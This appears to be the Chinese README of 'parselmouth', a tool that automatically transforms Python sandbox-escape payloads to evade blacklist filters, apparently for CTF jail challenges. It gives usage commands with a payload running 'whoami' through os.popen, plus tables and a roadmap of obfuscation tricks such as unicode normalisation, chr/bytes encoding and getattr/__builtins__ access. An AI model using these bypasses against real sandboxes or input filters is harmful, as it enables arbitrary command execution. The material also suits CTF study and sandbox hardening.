一个自动化的 Python 沙箱逃逸 payload bypass 框架
- python 版本最好是 >= 3.10
- 安装依赖:
pip install -r requirements
- 获取帮助信息:
python parselmouth.py -h
- 指定 payload 与 rule:
python parselmouth.py --payload "__import__('os').popen('whoami').read()" --rule "__" "." "'" '"' "read" "chr"
- 当然,很多时候规则字符比较多,所以你也可以考虑通过参数
--re-rule
来指定正则表达式格式的黑名单规则,例如--re-rule '[0-9]'
等价于--rule "0" "1" "2" "3" "4" "5" "6" "7" "8" "9"
- 友情提示,通过 win 命令行使用,如果需要指定
"
,则要用"\""
,如果用'"'
会出现非预期情况(我大概知道是啥原因但是我懒得管 win :)
- 当然,很多时候规则字符比较多,所以你也可以考虑通过参数
- 可以通过
--specify-bypass
指定 bypass function 的黑白名单;例如如果不希望 int 通过 unicode 字符的规范化进行 bypass,可以指定参数:--specify-bypass '{"black": {"Bypass_Int": ["by_unicode"]}}'
--minlen
:寻找最小的 exp--minset
:寻找最小字符集的 exp- 通过指定参数
-v
可以增加输出的信息;通过-vv
可以输出 debug 信息,但通常是不需要的
在定制化 bypass 函数之后,如果想做测试,可以将测试的 payload、rule、answer 按照放在 test_case.py
里面,然后通过 python run_test.py
进行测试
import parselmouth as p9h
p9h.BLACK_CHAR = {"kwd": [".", "'", '"', "chr", "dict"]}
# p9h.BLACK_CHAR = {"re_kwd": "\.|'|\"|chr|dict"} # 或者这样
runner = p9h.P9H(
"__import__('os').popen('whoami').read()",
specify_bypass_map={"black": {"Bypass_Name": ["by_unicode"]}},
min_len=True, versbose=0,
)
result = runner.visit()
status, c_result = p9h.color_check(result)
print(status, c_result, result)
p9h.P9H
关键参数解释:
source_code
: 需要 bypass 的 payloadspecify_bypass_map
: 指定 bypass function 的黑白名单;例如如果不希望变量名通过 unicode 字符的规范化进行 bypass,可以传参{"black": {"Bypass_Name": ["by_unicode"]}}
min_len
: 寻找最小的 expversbose
: 输出的详细程度(0
~3
)depth
: 通常情况下不需要使用这个参数;打印信息时所需要的缩进数量bypass_history
: 通常情况下不需要使用这个参数;用于缓存可以 bypass
和不可以 bypass
的已知情况,值示例{"success": {}, "failed": []}
在定制化之前,最好先阅读下这篇解释原理的文章以及 parselmouth.py
、bypass_tools.py
的主要代码
方法一:参考文章 传送门
方法二:
- 要新增一个 ast 类型的识别与处理,需要在
parselmouth.py
中的P9H
新增一个visit_
方法 - 如果希望通过与目标交互的方式进行 payload 检查,可以改写 check 方法,原则是如果检查通过返回空
[]
;如果检查不通过的话,最好是返回不通过的字符,如果条件有限,返回任意不为空的列表也可以 - 对已有的 ast 类型,需要新增不同的处理函数,则需要在
bypass_tools.py
中找到对应的 bypass 类型,并新增一个by_
开头的方法。同一个类下的 bypass 函数,使用顺序取决于对应类中定义的顺序,先被定义的函数会优先尝试进行 bypass
目前支持:
类 | 方法名 | payload | bypass | 解释说明 |
---|---|---|---|---|
Bypass_Int | by_trans | 0 |
len(()) |
|
Bypass_Int | by_bin | 10 |
0b1010 |
将数字转为二进制 |
Bypass_Int | by_hex | 10 |
0xa |
将数字转为十六进制 |
Bypass_Int | by_cal | 10 |
5*2 |
将数字转为算式 |
Bypass_Int | by_unicode | 10 |
int('𝟣𝟢') |
int + unicode 绕过 |
Bypass_Int | by_ord | 10 |
ord('\n') |
ord 绕过 |
类 | 方法名 | payload | bypass | 解释说明 |
---|---|---|---|---|
Bypass_String | by_empty_str | "" |
str() |
构造空字符串 |
Bypass_String | by_quote_trans | "macr0phag3" |
'macr0phag3' |
单双引号互相替换 |
Bypass_String | by_reverse | "macr0phag3" |
"3gahp0rcam"[::-1] |
字符串逆序绕过 |
Bypass_String | by_char | "macr0phag3" |
(chr(109) + chr(97) + chr(99) + chr(114) + chr(48) + chr(112) + chr(104) + chr(97) + chr(103) + chr(51)) |
char 绕过字符限制 |
Bypass_String | by_dict | "macr0phag3" |
list(dict(amacr0phag3=()))[0][1:] |
dict 绕过限制 |
Bypass_String | by_bytes_single | "macr0phag3" |
str(bytes([109]))[2] + str(bytes([97]))[2] + str(bytes([99]))[2] + str(bytes([114]))[2] + str(bytes([48]))[2] + str(bytes([112]))[2] + str(bytes([104]))[2] + str(bytes([97]))[2] + str(bytes([103]))[2] + str(bytes([51]))[2] |
bytes 绕过限制 |
Bypass_String | by_bytes_full | "macr0phag3" |
bytes([109, 97, 99, 114, 48, 112, 104, 97, 103, 51]) |
bytes 绕过限制 2 |
Bypass_String | by_join_map_str | "macr0phag3" |
str().join(map(chr, [109, 97, 99, 114, 48, 112, 104, 97, 103, 51])) |
join 绕过限制 |
Bypass_String | by_format | "macr0phag3" |
'{}{}{}{}{}{}{}{}{}{}'.format(chr(109), chr(97), chr(99), chr(114), chr(48), chr(112), chr(104), chr(97), chr(103), chr(51)) |
format 绕过限制 |
Bypass_String | by_hex_encode | "macr0phag3" |
"\x6d\x61\x63\x72\x30\x70\x68\x61\x67\x33" |
hex 编码绕过限制 |
Bypass_String | by_unicode_encode | "macr0phag3" |
"\u006d\u0061\u0063\u0072\u0030\u0070\u0068\u0061\u0067\u0033" |
unicode 编码绕过限制 |
Bypass_String | by_char_format | "macr0phag3" |
"%c%c%c%c%c%c%c%c%c%c%c%c" % (95,95,98,117,105,108,116,105,110,115,95,95) |
%c format 编码绕过限制 |
Bypass_String | by_char_add | "macr0phag3" |
'm'+'a'+'c'+'r'+'0'+'p'+'h'+'a'+'g'+'3' |
字符加法运算绕过限制 |
类 | 方法名 | payload | bypass | 解释说明 |
---|---|---|---|---|
Bypass_Name | by_unicode | __import__ |
__import__ |
unicode 绕过 |
Bypass_Name | by_builtins | __import__ |
__builtins__.__import__ |
从 builtins 获取 name |
类 | 方法名 | payload | bypass | 解释说明 |
---|---|---|---|---|
Bypass_Attribute | by_getattr | str.find |
getattr(str, 'find') |
getattr 绕过 |
Bypass_Attribute | by_getattr | str.find |
vars(str)["find"] |
vars 绕过 |
Bypass_Attribute | by_getattr | str.find |
str.__dict__["find"] |
__dict__ 绕过 |
类 | 方法名 | payload | bypass | 解释说明 |
---|---|---|---|---|
Bypass_Keyword | by_unicode | str(object=1) |
str(ᵒbject=1) |
unicode 绕过 |
类 | 方法名 | payload | bypass | 解释说明 |
---|---|---|---|---|
Bypass_BoolOp | by_bitwise | 'yes' if 1 and (2 or 3) or 2 and 3 else 'no' |
'yes' if 1&(2|3)|2&3 else 'no' |
and/or 替换成 &| |
Bypass_BoolOp | by_arithmetic | 'yes' if (__import__ and (2 or 3)) or (2 and 3) else 'no' |
'yes' if bool(bool(__imp𝒐rt__)*bool(bool(2)+bool(3)))+bool(bool(2)*bool(3)) else 'no' |
and/or 替换成基础运算 |
以及上述所有方法的组合 bypass。
如果在使用的过程中发现有比较好用的 bypass 手法,或者任何问题都可以提交 issue :D
以及不论通过或没通过这个工具解开题目,都欢迎提交 issue 帮忙补充案例,我会统一放在 challenges
中供大家学习使用,多谢啦
- 支持通过参数
--re-rule
来指定正则表达式格式的黑名单规则 - 支持 payload 字符集合大小限制:目前是贪心算法
- 打印可用的 bypass 手法
- 优化 bypass 单元测试
-
exec
、eval
+open
执行库代码 -
'__builtins__'
->'\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f'
-
'__builtins__'
->'\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f'
-
"os"
->"o" + "s"
@chi111i -
'__buil''tins__'
->str.__add__('__buil', 'tins__')
-
'__buil''tins__'
->'%c%c%c%c%c%c%c%c%c%c%c%c' % (95, 95, 98, 117, 105, 108, 116, 105, 110, 115, 95, 95)
@chi111i -
__import__
->getattr(__builtins__, "__import__")
@chi111i -
__import__
->__loader__().load_module
-
str.find
->vars(str)["find"]
# 注意基础类型 或者 自定义__slots__
没有__dict__
属性 -
str.find
->str.__dict__["find"]
# 注意基础类型 或者 自定义__slots__
没有__dict__
属性 -
",".join("123")
->"".__class__.join(",", "123")
-
",".join("123")
->str.join(",", "123")
-
"123"[0]
->"123".__getitem__(0)
-
"0123456789"
->sorted(set(str(hash(()))))
-
[1, 2, 3][0]
->[1, 2, 3].__getitem__()
-
2024
->next(reversed(range(2025)))
-
{"a": 1}["a"]
->{"a": 1}.pop("a")
-
1
->int(max(max(dict(a၁=()))))
-
[i for i in range(10) if i == 5]
->[[i][0]for(i)in(range(10))if(i)==5]
-
==
->in
-
True or False
->(True) | (False)
@chi111i -
感觉不实用True or False
->bool(- (True) - (False))
-
True or False
->bool((True) + (False))
@chi111i -
True and False
->(True) & (False)
@chi111i -
True and False
->bool((True) * (False))
@chi111i -
[2, 20, 30]
->[i for i in range(31) for j in range(31) if i==0 and j == 2 or i == 1 and j ==20 or i == 2 and j == 30]